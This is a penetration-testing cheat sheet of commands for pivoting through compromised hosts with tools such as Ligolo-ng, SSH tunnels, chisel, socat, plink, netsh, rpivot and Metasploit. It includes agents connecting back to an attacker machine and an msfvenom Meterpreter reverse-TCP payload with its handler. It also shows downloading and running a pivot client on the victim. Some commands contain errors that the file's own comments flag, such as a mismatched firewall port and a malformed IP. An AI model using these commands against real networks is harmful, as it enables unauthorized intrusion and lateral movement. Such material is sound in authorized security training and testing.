Pivoting / Forwarding
00. Basic Enumerations
## ------------------| Check ARP table
arp -an
01. Port Forwarding
01.0 Ligolo-ng
## ------------------| Agent [target/victim computer]
.\agent.exe -connect <MyIP>:11601 -ignore-cert
## ------------------| Server [My Computer]
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
session
ifconfig
sudo ip route add <IPRange>/24 dev ligolo
start
nmap <IP>
01.1 SSH Port Forward
## -N Do not execute a remote command. This is useful for just forwarding ports.
~C # ssh escape sequence: type it as the first characters of a fresh line (right after Enter) to open the ssh> command prompt
## ------------------| Local Port Forward
## Local Host <--> SSH Server <--> Remote Host
ssh -L <host_port>:<remote_ip>:<remote_port> <user>@<sshserverip>
## ex: ssh -L 3306:127.0.0.1:3306 <user>@<sshserverip>   (the original user@host was garbled by extraction)
## 3306 is victim's machine port
## 1337 is our machine port
ssh> -L 1337:127.0.0.1:3306
ssh -L 1337:127.0.0.1:3306 <user>@<machine_to_pivot>
## ------------------| Remote Port Forward
## Remote Host <--> SSH Server <--> Local Host
ssh -R <remote_port>:<remote_ip>:<host_port> <user>@<sshserverip>
## 3306 is victim's machine port
## 1337 is our machine port
## NOTE: -R is the mirror image of -L: the listening port (1337) is opened on <machine_to_pivot>, and 127.0.0.1:3306 is connected to from our (client) side — double-check which host each port belongs to before relying on the two comments above
ssh -R 1337:127.0.0.1:3306 <user>@<machine_to_pivot>
## ------------------| Dynamic Port Forward (use with proxychains)
ssh> -D 1080
socks5 127.0.0.1 1080
## Configure proxychains
sudo vi /etc/proxychains.conf
socks5 127.0.0.1 1080
## our machine's SOCKS listener port in these commands is 1080 (not 1337 as in the sections above)
ssh -D 127.0.0.1:1080 <user>@<machine_to_pivot>
ssh -D 127.0.0.1:1080 -f -N <user>@<machine_to_pivot>
## Launch nmap
proxychains nmap -sT 172.16.1.0/24
01.2 Socat Multipurpose relay
## ------------------| Normal
socat TCP-LISTEN:4444,fork TCP:0.0.0.0:631
socat TCP-LISTEN:4444,fork,bind=10.10.14.26 TCP:127.0.0.1:3306
## ------------------| Send smb traffic from kali VM to windows VM
sudo socat TCP-LISTEN:445,fork,reuseaddr TCP:<WINDOWS_VM_IP>:445
01.3 Using Chisel
## ------------------| Normal
## Server side
./chisel server --reverse --port 1234
## Client side
./chisel client 10.10.14.26:1234 R:3000:127.0.0.1:3000 R:3001:127.0.0.1:3001
## ------------------| SOCKS5 (With Proxychains)
## Server side
chisel server --reverse --port 1234
## Client side
./chisel client 10.14.14.7:1234 R:0.0.0.0:1080:socks
## Edit /etc/proxychains.conf
socks5 127.0.0.1 1080
## Use nmap with proxychains
01.4 Using sshuttle
## ------------------| For all routes
sudo sshuttle -vvr [email protected] 0/0
sudo sshuttle -vr [email protected] 0/0 --ssh-cmd "ssh -i ./id_rsa"
sudo sshuttle -vr [email protected] 0.0.0.0/0 --ssh-cmd "ssh -i ./id_rsa"
sudo sshuttle -vr [email protected] 0.0.0.0/24 --ssh-cmd "ssh -i ./id_rsa"
## ------------------| For specific route
sudo sshuttle -vr [email protected] 172.16.1.0/24 --ssh-cmd "ssh -i ./id_rsa"
01.5 Using ncat tunnel
## ------------------| Set up ncat on the target machine
ncat -vv --listen 1337 --proxy-type http
## ------------------| Edit on the attacker machine (10.10.110.100 is the IP of my ssh machine)
echo "http\t 10.10.110.100 \t1337" >> /etc/proxychains.conf
# To verify (note: plain echo does not expand \t in bash, so check that real tabs — not a literal "\t" — ended up in the file)
tail -2 /etc/proxychains.conf
## ------------------| Then use proxychains
proxychains nmap -sT 172.16.1.0/24
01.6 Using httptunnel
## ------------------| On Server
hts --forward-port localhost:3306 1337
## ------------------| On Client
htc --forward-port 3306 <compromised_ip>:1337
01.7 Using Plink.exe
cp /usr/share/windows-resources/binaries/plink.exe .
.\plink.exe root@<OURIP> -R 445:127.0.0.1:455
cmd.exe /c echo y | plink.exe -ssh -l <USER> -pw <PASSWORD> -R <our_ip>:1337:127.0.01:3306 <our_ip>
01.8 Using netsh.exe
## 3306 is victim's machine port
## 1337 is compromised machine port
netsh interface portproxy add v4tov4 listenport=1337 listenaddress=<compromised_ip> connectport=3306 connectaddress=<remote_ip>
## Add firewall rule (localport must match the portproxy listenport above, i.e. 1337; 4545 as written below would not open the forwarded port)
netsh advfirewall firewall add rule name="forward_port" protocol=TCP dir=in localip=<compromised_ip> localport=4545 action=allow
01.9 Using rinetd
## ------------------| Forward my google.com traffic to the restricted device
sudo vi /etc/rinetd.conf
### Jump to line 19 and add the following line
0.0.0.0 80 <GoogleIPAddress> 80
### Restart service
sudo service rinetd restart
### Success? (check from the restricted machine)
nc -znv <AttackerIP> 80
01.10 Using rpivot.exe [Best for Windows XP]
## ------------------| Start server on attacker machine
git clone https://github.com/klsecservices/rpivot.git && cd rpivot
python2 server.py --server-ip 0.0.0.0 --server-port 8989
## ------------------| Start rpivot on compromised machine
wget https://github.com/klsecservices/rpivot/releases/download/v1.0/client.exe
.\client.exe --server-ip <IP> --server-port 8989
## ------------------| Proxy
/etc/proxychains.conf
socks4 127.0.0.1 1080
proxychains nmap -sT -p 80 <IP>
01.11 Using Metasploit with Meterpreter
## ------------------| Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<MyIP> LPORT=7799 -f elf -o msf.bin
## ------------------| Launch MSFConsole
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 7799
set lhost 10.10.14.13
run -j
sessions -i
## ------------------| Method 0x01
route add <Compromised_IP_Address/24> <meterpreter_session_id>
## --> ex : route add 172.17.0.0/24 1
use auxiliary/server/socks_proxy
set SRVPORT 1080 # edit this port on /etc/proxychains.conf (socks5)
run
## ------------------| Method 0x02
## !! You must be in the " meterpreter > " shell
portfwd add -l 8003 -p 3306 -r 172.17.0.2
## -l (8003) is the local listening port on our machine
## -p (3306) is the port on the compromised machine
## -r is the compromised machine's IP address (172.17.0.2 in the command above)
## then you can use 127.0.0.1:8003 from your end